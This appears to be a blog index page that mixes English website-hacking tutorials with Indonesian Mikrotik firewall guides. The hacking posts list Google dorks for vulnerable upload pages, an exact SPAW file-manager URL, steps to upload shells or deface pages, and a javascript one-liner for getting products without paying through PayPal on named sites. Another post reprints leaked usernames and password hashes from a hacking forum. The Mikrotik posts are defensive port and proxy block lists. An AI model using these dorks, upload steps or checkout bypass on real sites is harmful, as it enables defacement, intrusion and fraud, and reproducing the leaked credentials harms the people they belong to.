Spaw Shell Upload Vulnerablity

Spaw Shell Upload Vulnerablity:Hello Friends, today I'm going to share another Shell upload Vulnerablity with you all called Spaw Shell Upload Vulnerablity.. 2016

Follow the Instructions:-

1). Go to google and paste one of the following dorks as you like :)

  inurl:"spaw2/dialogs/"
  inurl:"spaw2/uploads/files/"

2). You will get lots of results. Open any site..

For Example i got :- example.com/spaw2/dialogs/

3). Now replace spaw2/dialogs/ with

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

  So now our url will look like this :-

example.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

4). Now open the site and it will look like this->

5). Now upload your deface page.. :)

Happy Hacking..ONly for educational Purposes..

Tags:

• Spaw Shell Upload Vulnerablity
• how to upload shell
• how to hack websites
• defacepage
• deface website
• free shell
• shell upload vulnerablity

Read more

Memblokir Port Virus di Mikrotik Menggunakan Firewall

Penyebaran virus dan malware di jaringan dapat terjadi jika kita tidak selektif dalam mengaktifkan port apa saja yang digunakan. Untuk mengamankan jaringan dari penyebaran virus dan malware, kita dapat menutup port komunikasi yang tidak digunakan dan rentan dimanfaatkan oleh virus. Caranya dengan menggunakan rule firewall Mikrotik untuk men-drop paket yang masuk ke port yang tidak digunakan.

Caranya sangat mudah, silakan anda copy paste command berikut ini ke terminal Mikrotik :

/ ip firewall filter
add chain=virus protocol=tcp dst-port=135-139 action=drop comment="Blaster Worm"
add chain=virus protocol=udp dst-port=135-139 action=drop comment="Messenger Worm"
add chain=virus protocol=tcp dst-port=445 action=drop comment="Blaster Worm"
add chain=virus protocol=udp dst-port=445 action=drop comment="Blaster Worm"
add chain=virus protocol=tcp dst-port=593 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1024-1030 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1080 action=drop comment="Drop MyDoom"
add chain=virus protocol=tcp dst-port=1214 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1363 action=drop comment="ndm requester"
add chain=virus protocol=tcp dst-port=1364 action=drop comment="ndm server"
add chain=virus protocol=tcp dst-port=1368 action=drop comment="screen cast"
add chain=virus protocol=tcp dst-port=1373 action=drop comment="hromgrafx"
add chain=virus protocol=tcp dst-port=1377 action=drop comment="cichlid"

add chain=virus protocol=tcp dst-port=2745 action=drop comment="Bagle Virus"
add chain=virus protocol=tcp dst-port=2283 action=drop comment="Dumaru.Y"
add chain=virus protocol=tcp dst-port=2535 action=drop comment="Beagle"
add chain=virus protocol=tcp dst-port=2745 action=drop comment="Beagle.C-K"
add chain=virus protocol=tcp dst-port=3127-3128 action=drop comment="MyDoom"
add chain=virus protocol=tcp dst-port=3410 action=drop comment="Backdoor OptixPro"
add chain=virus protocol=tcp dst-port=4444 action=drop comment="Worm"
add chain=virus protocol=udp dst-port=4444 action=drop comment="Worm"
add chain=virus protocol=tcp dst-port=5554 action=drop comment="Drop Sasser"
add chain=virus protocol=tcp dst-port=8866 action=drop comment="Drop Beagle.B"
add chain=virus protocol=tcp dst-port=9898 action=drop comment="Drop Dabber.A-B"
add chain=virus protocol=tcp dst-port=10000 action=drop comment="Drop Dumaru.Y"
add chain=virus protocol=tcp dst-port=10080 action=drop comment="Drop MyDoom.B"
add chain=virus protocol=tcp dst-port=12345 action=drop comment="Drop NetBus"
add chain=virus protocol=tcp dst-port=17300 action=drop comment="Drop Kuang2"
add chain=virus protocol=tcp dst-port=27374 action=drop comment="Drop SubSeven"
add chain=virus protocol=tcp dst-port=65506 action=drop comment="Drop PhatBot,Agobot, Gaobot"
add chain=virus protocol=udp dst-port=12667 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=27665 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=31335 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=27444 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=34555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=35555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=27444 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=27665 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=31335 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=31846 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=34555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=35555 action=drop comment="Trinoo" disabled=no
add action=drop chain=forward comment=";;Block W32.Kido - Conficker" disabled=no protocol=udp src-port=135-139,445
add action=drop chain=forward comment="" disabled=no dst-port=135-139,445 protocol=udp
add action=drop chain=forward comment="" disabled=no protocol=tcp src-port=135-139,445,593
add action=drop chain=forward comment="" disabled=no dst-port=135-139,445,593 protocol=tcp
add action=accept chain=input comment="Allow limited pings" disabled=no limit=50/5s,2 protocol=icmp
add action=accept chain=input comment="" disabled=no limit=50/5s,2 protocol=icmp
add action=drop chain=input comment="drop FTP Brute Forcers" disabled=no dst-port=21 protocol=tcp src-address-list=FTP_BlackList
add action=drop chain=input comment="" disabled=no dst-port=21 protocol=tcp src-address-list=FTP_BlackList
add action=accept chain=output comment="" content="530 Login incorrect" disabled=no dst-limit=1/1m,9,dst-address/1m protocol=tcp
add action=add-dst-to-address-list address-list=FTP_BlackList address-list-timeout=1d chain=output comment="" content="530 Login incorrect" disabled=no protocol=tcp
add action=drop chain=input comment="drop SSH&TELNET Brute Forcers" disabled=no dst-port=22-23 protocol=tcp src-address-list=IP_BlackList
add action=add-src-to-address-list address-list=IP_BlackList address-list-timeout=1d chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_3
add action=add-src-to-address-list address-list=SSH_BlackList_3 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_2
add action=add-src-to-address-list address-list=SSH_BlackList_2 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_1
add action=add-src-to-address-list address-list=SSH_BlackList_1 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp
add action=drop chain=input comment="drop port scanners" disabled=no src-address-list=port_scanners
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,syn
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=syn,rst
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg

Hasilnya akan jadi seperti ini :

Nah, sekarang kita sudah berhasil Memblokir Port Virus Menggunakan Firewall di Mikrotik.
Semoga bermanfaat :)

Read more

Paypal Javascript Exploit - Get Products Free

In this Tutorial we are talking about Paypal Javascript  Exploit. So Here is a simple JavaScript exploit through which you can hack Paypal & download products for free without spending single penny . More then 500 sites are Vulnerable !! .

So lets start..! ;)

Follow The Instructions:-

1). Go to the vulnerable site & paste the below JavaScript given below in the browser & hit enter !!.

javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

2). So after you have hit enter, just sit back & enjoy the free product .

Live Demo :-
Vulnerable Site  - http://www.orderproductsdirect.com/Instantdownload.htm

3). So after you paste the JavaScript in the URL then the product will be automatically downloaded :)

More Vulnerable sites link -

 Click Here  (some sites are patched)

&

Password 

Enjoy...!!

Read more

Testing Image Shell and Deface Upload Vulnerability

In this tutorial we are talking about Testing Image Shell and Deface Upload Vulnerability. So lets start..

Follow the Instructions:

1). Search the following dorks.

Dorks:
inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
intitle:"Testing Image Collections"

2). Use both Google and Bing to search the above dork to find more vulnerable websites. 

3). Select any Website from the search result.Find the upload option. in the bottom left corner..

4). Now, Select your deface or Shell and Upload it.

To view your Uploaded shell or deface visit:
http://website.com/files/yourfilehere  

 http://websites.com/path/yourfilehere

Happy Hacking!! Only for Educational purposes..!!

Read more

Madleets Got Hacked and Data Leaked

The one of famous Pakistan hacking group Team Madleets hacked and their users leaked .The hacker  with the handle name “Dukhi Nawab” hacked and leaked the Madleets Admin and Moderator details before few minutes. Their team know as “PakBug” . PakBugs / Xploiter Crew hacked madleets 2nd time . Two months ago the owner of Xploiter Crew also Defaced the Madleets subdomains . The Hacker did not defaced the Website he just leaked the data.

Dukhi Nawab says:-
MadLeets HaCked And Data Leaked By DuKhi NawaB (PAKbugs jr)
Too long db, got bored to leak all.. anyways remember that maddies we are ur daddies..
And neXt time secure your ass..
greetz ; ZombiE_KsA, stoKer, Xploiter & Dr.Freak

Leaked Database :-

1      1337                   1733bab470835253a22231dab3fe3dca

2      h4x0rl1ƒ3                ac39d4fe6fdb8ce21c72e4efaefd6e73

3      Tor Demon           8d685488c51f1497beb2863f7503b224

4      MindCracker              f4f7d36949cad89ff77379598069109b

More Database :- Click here

Read more

File Thingie Shell Upload Exploit Vulnerablity

This is a vulnerability which allows a remote attacker to upload his/her deface or shell on the website.

Follow the Steps=>

1). Go to google and search this dork. :)

Google Dork : inurl:ft2.php intext:upload

2). After the searching the above dork, you will get websites vulnerable to this. 

3). Select any website, upload your deface or shell there.

4). To view your deface or shell, just click on your file name after its uploaded.

Happy Hacking .ONly for Educational Purposes ..!!!!!

File Thingie Shell Upload Exploit Vulnerablity
File Thingie Shell Upload
File Thingie Exploit

Read more

Cara Export & Import Konfigurasi/Setingan Mikrotik

Export & Import Konfigurasi/Setingan Mikrotik hampir sama dengan melakukan backup & restore seperti yang sudah pernah saya bahas disini :  

Cara Backup dan Restore Konfigurasi Router Mikrotik

Bedanya Export - Import dengan Backup - Restore :

1. File hasil backup tidak bisa dibuka di notepad PC, sedangkan file hasil export bisa.

2. File hasil export berisi script konfigurasi/setingan Mikrotik yang dapat langsung di copy-paste dan dieksekusi di terminal Mikrotik.

Jadi, fitur Export ini dapat digunakan untuk melihat konfigurasi Mikrotik dalam bentuk script (command line). File ini juga bisa digunakan untuk import konfigurasi Mikrotik, sama halnya dengan fungsi Backup - Restore Mikrotik.

Cara Export & Import Konfigurasi/Setingan Mikrotik sebagai berikut :

1. Buka terminal  masukkan command berikut :

export file=namafile

Ganti namafile sesuai keinginan anda.

Selain itu kita juga bisa melakukan export untuk konfigurasi spesifik, misal mau export konfigurasi firewall saja jadi command nya gini :

ip firewall export file=namafile

2. Hasil file export nya tersimpan di file, coba lihat dengan command 

file print

3. Untuk meng-copy file konfigurasi tersebut, buka menu file --> pilih file konfigurasi mana saja yang mau di-copy --> klik tombol copy di toolbar --> masuk ke folder Windows Explorer --> Paste di folder mana terserah anda.

4. Extensi file export ini adalah .rsc. Kita bisa membuka file ini dengan notepad.

5. Jika ingin meng-import file konfigurasi ini buka terminal --> ketikkan command :

import file-name=namafile

Oke, demikianlah tutorial mikrotik tentang Cara Export & Import Konfigurasi/Setingan Mikrotik.
Semoga bermanfaat :)

Read more

Cara Memblokir Penggunaan Web Proxy External di Mikrotik

Web Proxy external dapat digunakan untuk mem-bypass firewall dan membuka situs yang tadinya diblokir. Hal ini tentunya bisa bikin kita gigit jari, ketika sudah susah payah bikin sistem dengan firewall untuk memblokir situs macam-macam, ternyata client menggunakan proxy untuk mem-bypass firewall nya. Cape deh.. 

Nah, supaya client tidak bisa menggunakan proxy external untuk mem-bypass firewall, kita perlu memblokir penggunaan web proxy external dengan menggunakan Mikrotik. Caranya dengan membuat rule firewall mikrotik yang memblokir penggunaan port proxy. Hal ini dapat mencegah user/client untuk menggunakan proxy.

Ok, langsung saja ya ikuti Cara Memblokir Penggunaan Web Proxy External di Mikrotik berikut ini :

1. Jika anda menggunakan web proxy internal di Mikrotik, pastikan port nya diganti ke port yang tidak biasa dipake proxy, misalnya port 88

2. Jika anda menggunakan mode transparent proxy, pastikan port redirect nya juga sudah diganti ke port baru, misalnya port 88

3. Buat rule firewall baru dengan melakukan "drop" semua port yang digunakan oleh proxy. Anda bisa copy - paste script berikut ini di terminal :

/ip firewall filter
add action=drop chain=forward comment="Blokir Proxy Port #1" dst-port=\
    3128,54321,6515,6666,8000,8001,8008,808,8080,8081,8088 protocol=tcp \
    src-address=0.0.0.0/0
add action=drop chain=forward comment="Blokir Proxy Port #2" dst-port=\
    8090,81,8118,8181,82,83,84,85,86,8888,8909,9000,9090 protocol=tcp \
    src-address=0.0.0.0/0

4. Jika anda menemukan port lain yang digunakan proxy, silakan ditambahkan sendiri ya.

5. Berikut contoh penggunaannya ketika saya mencoba membuka sebuah web yang diblokir :

=> Sebelum menggunakan proxy

=> Menggunakan proxy

=> Setelah port proxy di "drop"

Nah, jadi dengan trik ini kita bisa mencegah user/client untuk menggunakan proxy selama port proxy yang mereka gunakan sudah masuk ke daftar blokir. 

Oke, demikianlah tutorial mikrotik tentang Cara Memblokir Penggunaan Web Proxy External di Mikrotik. Silakan dicoba dan semoga bermanfaat :)

Read more